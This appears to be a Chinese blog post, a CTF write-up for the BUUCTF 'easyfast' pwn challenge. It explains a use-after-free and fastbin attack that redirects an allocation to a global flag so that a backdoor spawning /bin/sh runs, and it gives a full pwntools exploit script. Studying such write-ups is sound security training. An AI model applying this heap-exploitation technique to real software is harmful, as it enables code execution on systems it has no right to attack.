buu easyfast —— fastbin attack 基础

已于 2022-05-24 08:53:13 修改
阅读量206 收藏 1
点赞数
分类专栏: 学习笔记 文章标签: pwn heap chunk fast bin
于 2022-05-24 08:51:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48066554/article/details/124940066
版权

buu easyfast —— fastbin attack 基础

文章目录

引入

面对恐惧,开始啃堆,柿子挑软的捏

初分析

题目默认环境Ubuntu16.04,该系统默认使用libc2.23,建议使用docker环境

checksec

在这里插入图片描述

伪代码
  • add
unsigned __int64 add_400916()
{
  int v0; // eax
  int v1; // ebx
  char s[24]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v4; // [rsp+28h] [rbp-18h]

  v4 = __readfsqword(0x28u);
  if ( dword_6020BC <= 3 )
  {
    puts("size>");
    fgets(s, 8, stdin);
    v0 = atoi(s);
    if ( v0 && (unsigned __int64)v0 <= 0x78 )
    {
      v1 = dword_6020BC++;
      *(&buf + v1) = malloc(v0);
    }
    else
    {
      puts("No need");
    }
  }
  else
  {
    puts("No need");
  }
  return __readfsqword(0x28u) ^ v4;
}

add中没有什么特殊的点

  • del
unsigned __int64 del_4009D7()
{
  __int64 v1; // [rsp+8h] [rbp-28h]
  char s[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("index>");
  fgets(s, 8, stdin);
  v1 = atoi(s);
  free(*(&buf + v1));
  return __readfsqword(0x28u) ^ v3;
}

del函数中,free后指针未置空,出现指针悬挂漏洞,可以UAF

  • edit
unsigned __int64 sub_400A4D()
{
  __int64 v1; // [rsp+8h] [rbp-28h]
  char s[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("index>");
  fgets(s, 8, stdin);
  v1 = atoi(s);
  read(0, *(&buf + v1), 8uLL);
  return __readfsqword(0x28u) ^ v3;
}

edit没有特殊检测,限制edit长度8

  • backdoor
int backdoor_400896()
{
  int result; // eax

  if ( qword_602090 )
    result = puts("Not yet");
  else
    result = system("/bin/sh");
  return result;
}

自带后门函数,只要把qword_602090置0,就可以直接get shell,典型Arbitrary Alloc

思路

​ 总体思路是:通过uaf更改堆块中的fd指针为目标地址,然后利用malloc与fast bin的机制获取目标地址的控制权,最后调用后门函数。

​ 由于fastbin的机制,我们先申请两个大小在fastbin范围内的chunk,此时malloc函数会找到大小合适的chunk返回。之所以申请两个chunk,是为了在后续free chunk0的时候,用chunk1把chunk0与top chunk分隔开,这样才能使chunk0顺利进入fast bin。此时堆区chunk如图。
在这里插入图片描述

​ 随后free chunk0,然后利用未置空的指针0编辑chunk0的fd位,为的是在fast bin链表的尾部加入我们伪造的fake chunk。堆区chunk分布如下 (两张截图不是同一次运行的截图,故基地址有区别)

在这里插入图片描述在这里插入图片描述

​ 由于malloc函数的机制是:当需要分配的空间大小在fast bin大小范围内时,先到fast bin中寻找有无对应大小的chunk,于是如果在修改chunk0的fd位后,连续进行两次malloc,malloc就会误把0x602080这个地址当作之前释放的chunk的首地址,返回给用户。这个时候我们就获得了该地址的控制权。

​ 但我们需要更改的数据在0x602090,为什么要在0x602080构造fake chunk呢,因为chunk的用户数据位置也就是用户实际能更改的位置是chunk指针+0x10的位置,这一特点是由chunk的结构决定的,chunk结构见下图

在这里插入图片描述

最后更改指定数据,成功调用backdoor

在这里插入图片描述

exp

from pwn import *

p=process('./easyfast')
# p = process(["/glibc/2.23/64/lib/ld-2.23.so", "./easyfast"], env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc-2.23.so:"})
# p = process( "./easyfast", env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc-2.23.so:"})
#p=remote("node4.buuoj.cn",25597)
context.log_level="debug"

def add(size):
	p.recvuntil('choice>')
	p.sendline('1')
	p.recvuntil('size>')
	p.sendline(str(size))
	

def delete(index):
	p.recvuntil('choice>')
	p.sendline('2')
	p.recvuntil('index>')
	p.sendline(str(index))

def edit(idx,content):
	p.sendlineafter('choice>','3')
	p.sendlineafter('index>',str(idx))
	p.send(content)

def backdoor():
	p.sendlineafter('choice>','4')

add(0x40)  # chunk 0
add(0x40)  # chunk 1
delete(0)

edit(0,p64(0x602080))
#pause()
add(0x40)  # chunk 0

add(0x40)#3
edit(3,p64(0))
#pause()
backdoor()
p.interactive()
lunat:c
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]pwn - wustctf2020_easyfast (Use After Free)
半岛铁盒的博客
06-10 399
打开菜单,了解到相应的功能后,改一下名字 这个漏洞大致利用方式是这样的; 利用思路 通过double free修改chunk0的fd指针,让申请到的chunk能够覆盖到0x602090,修改1为0,最后直接调用backdoor来getshell from pwn import * #p=process('./wustctf2020_easyfast') p=remote("node3.buuoj.cn",25044) context.log_level="debug" def add(si
wustctf2020_easyfast(uaf)
m0_51251108的博客
11-05 522
wustctf2020_easyfast: 逆向分析: 主界面: add函数: free函数: edit函数: backdoor: 这题是libc2.23的doublefree,注意区别 引用这位师傅的回顾double free手法 在glibc2.27之前,主要是fastbin double free: fastbin在free时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2), free(C1)的手法绕过 并在在fastbin取出时,
wustctf2020_easyfast
m0_73756460的博客
02-26 291
buu刷题wustctf2020_easyfast【wp】
wustctf 2020 easyfast 做题笔记
fa1c4的blog
09-06 336
前言 一道fastbin attack (fastbin double free/ 其实BUU这题是UAF) 的题目 BUU有环境 分析过程 分析之后重命名各个函数 void sub_400ACD() { char s[8]; // [rsp+0h] [rbp-20h] BYREF __int64 v1; // [rsp+8h] [rbp-18h] unsigned __int64 v2; // [rsp+18h] [rbp-8h] v2 = __readfsqword(0x28u);
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
binary_vulnerability:二进制突破之栈溢出原理和利用技术,绕过安全保护技术(绕过NX,ASLR,PIE,Canary,RELRO等),格式化串行突破原理是利用技术,大量溢出漏洞原理和利用技术,glibc2 .30内存管理二进制文件深入分析,堆迭扩展(fastbin攻击,UAF,双重释放,堆重叠和扩展攻击,unlink攻击,house系列攻击)突破原理和攻破技巧
03-23
漏洞利用 二进制漏洞挖掘技术摘要 该项目是关于挖掘二进制突破的一些技术和技巧,可以理解为它是一个教材,里面包含了一些常见突破的原理和攻击方式。 由于本人水平有限,不能避免可能会在文档中出现错误,敬请原谅。 注意: 该项目版权尽属于我个人所有,这包括项目中的文档和源码,你可以下载和查看,该项目涉及的所有文档和代码仅能进行学习交流目的,但不能以下用途否则必究: 1,相关项目和文档不能被发布到网上或其他地方 2,不能用于商业目的(如复制,摘抄,或者通过部分更改复制,摘抄或用作出书,发帖,发文章等。否则后果自负!!!),违背剥削!!!
[pwn]堆:fastbin attack详解
Breeze的博客
12-31 1万+
[pwn]fastbin attack 文章目录[pwn]fastbin attackfastbin attack原理double freeuse after freechunk extend需要注意的点:0ctf:babyheap fastbin attack原理 fastbin attack是利用fastbin分配原理的漏洞,利用要求是我们能够修改“已释放”堆块。通常情况下与double fr...
好好说话之Fastbin Attack(2):House Of Spirit
hollk’s blog
10-30 3076
Fastbin Attack的第二种攻击方式House Of Spirit,相对来说是double free的升华。在检查绕过的时候会相对麻烦一点,其他的地方还是挺简单的,如果上一篇文上你领悟的很好的话,这篇文章也不会很难理解。 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
好好说话之Fastbin Attack(4):Arbitrary Alloc
hollk’s blog
01-13 1911
总体来说这个方法并不难,例题2017 0ctf babyheap也不难,如果有仔细看过我的上一篇[2015 9447 CTF : Search Engine](https://blog.csdn.net/qq_41202237/article/details/111320740)的讲解,相信这个方法的例题对你来说只是流程更复杂一点,但是泄露libc啊、malloc_hook啊这种关键步骤还是一致的。流程部分我的方法是拿笔纸把每一步的chunkbin写出来,这样更加集中注意力,哪里存在变化,都可以很快的发现
堆学习笔记-UAF
N1rvana的博客
11-15 2296
我的学习笔记大量都是基于CTF-WIKI。 UAF,Use After Free的缩写,是一种常见漏洞。 原理 Use After Free意如其名,是一个内存漏洞,当一个内存块被释放后又被使用,有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用
BUU刷题 ROPgadget直接拼凑,off by one,overlapping,fastbin attack uaf system参数截断 data段覆盖指针
carol2358的博客
06-27 722
考完了,我活了。 这题ida里看着特别复杂,但其实就一个gets 静态编译: ida看起来特复杂,就是静态编译的结果。静态编译就不会调用libc中的东西,所以我们也不存在泄露版本利用libc的函数了。 https://www.cnblogs.com/bhxdn/p/12347296.html 直接 ROPgadget --binary rop --ropchain from pwn import * from struct import pack #r = process('./inndy_rop
fastbin attack快速入门
abelxu
11-13 1120
0x01 fastbin简介 Fastbin包含0x20~0x80大小bin的数组指针,用于快速分配小堆块。fastbin按照单链表结构进行组织,相同大小bin在同一个链表中,fd指向下一个bin,采用LIFO(Last In First Out)机制。在fastbin中,堆块的inuse标志都为1,处于占用状态,防止chunk释放时进行合并,加快小堆块的分配。 正常fastbin的使用 通过这个简单的案例来了解fastbin的单链表结构,malloc和free的过程。 #include<stdio
pwn工具箱之fastbin attack
jmp esp
05-22 2233
fastbin attack基本信息 利用类型: 堆利用 堆利用类型: 针对fastbin的利用 利用思想: 利用fastbin的free只检查是否和上一个freechunk相等,使得同一个chunk两次进入free list,造成UAF,可以更改fastbin free chunk的fd信息,最终分配一个特定地址 利用难点 需要能够两次free同一个chunk 更改fd的时候,为了能够在之后的ma
UAF (Use After Free)漏洞分析及利用
热门推荐
4ct10n
06-23 2万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值